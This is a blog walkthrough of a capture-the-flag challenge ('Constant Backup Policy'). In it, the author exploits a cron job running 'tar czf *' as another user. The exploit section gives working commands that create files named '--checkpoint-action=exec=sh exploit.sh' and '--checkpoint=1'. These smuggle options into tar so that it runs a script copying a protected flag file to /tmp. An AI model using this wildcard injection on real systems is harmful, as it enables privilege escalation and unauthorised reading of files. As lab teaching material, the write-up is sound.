CREATIVE CHAOS   ▋ blog

Constant Backup Policy (misc)

PUBLISHED ON 17/11/2020 — EDITED ON 11/12/2023 — 247CTF, INFOSEC

Instructions

Our admins take their backup policies very seriously. Every single second they “/bin/tar czf *” our entire home directory. Can you trick the admin’s into leaking the flag?

Intelligence

  1. We can see that superuser runs a backup.
  2. We know what command they run.
  3. How to exploit wildcard tar?

Poking around

First lets check who we are:

bash-4.3$ whoami
notroot

Anything interesting in our home dir:

bash-4.3$ cd /home/notroot/
bash-4.3$ ls

What is running on the system:

bash-4.3$ ps
PID   USER     TIME   COMMAND
    1 root       0:25 {supervisord} /usr/bin/python2 /usr/bin/supervisord -c /etc/supervisord.conf
    9 flag       0:07 {cron.sh} /bin/sh /home/flag/cron.sh
   10 notroot    0:00 /usr/bin/ttyd -g 1000 -u 1000 -x /bin/bash
 6046 notroot    0:00 /bin/bash
28646 flag       0:00 /bin/tar czf /home/flag/backup.tar *
28647 flag       0:00 /bin/sh -c gzip
28648 notroot    0:00 ps

That /home/flag looks promising, lets investigate:

bash-4.3$ cd /home/
bash-4.3$ ls
flag     notroot
bash-4.3$ ls flag/
backup.tar                cron.sh                   flag_c6b0057b3d798b0.txt
bash-4.3$ cat flag/flag_c6b0057b3d798b0.txt
cat: can't open 'flag/flag_c6b0057b3d798b0.txt': Permission denied
bash-4.3$ ls -la flag/
total 12
drwxr-sr-x    1 flag     flag            24 Nov 17 16:11 .
drwxr-xr-x    1 root     root            33 Nov 16 10:55 ..
-rw-r--r--    1 flag     flag           197 Nov 17 16:11 backup.tar
-r-x------    1 flag     flag           134 Jan 25  2020 cron.sh
-r--------    1 flag     flag            41 Jan 25  2020 flag_c6b0057b3d798b0.txt

Exploit

Check what can we do with tar and wildcards, you can search the web for the exploit, or look into the help for tips:

bash-4.3$ tar --help
...
--checkpoint[=NUMBER]  display progress messages every NUMBERth record
                       (default 10)
--checkpoint-action=ACTION   execute ACTION on each checkpoint
...

As superuser executes the “backup” command over whole /home, we can put the exploit in our home folder:

bash-4.3$ cd /home/notroot/
bash-4.3$ echo 'cat /home/flag/flag_c6b0057b3d798b0.txt > /tmp/flag.txt' > exploit.sh
bash-4.3$ echo "" > "--checkpoint-action=exec=sh exploit.sh"
bash-4.3$ echo "" > --checkpoint=1

Basically we want tar to use filenames as parameters and run whatever we put into exploit.sh. In our case, we know that flag is stored in /home/flag/flag_c6b0057b3d798b0.txt and we want to write it to a file. Be careful, we need to set destination file to something user flag can write into, so that is why we choose /tmp/flag.txt. Using ~/flag.txt won’t work, as flag has no permissions to write in /home/notroot. We know that because of the output of the ps above, where we can see that tar is ran by flag user.

We wait a second, so that cron is executed and we can obtain the flag:

bash-4.3$ cat /tmp/flag.txt
247CTF{xxx}
TAGS: 247CTF, BASH, TAR, WILDCARD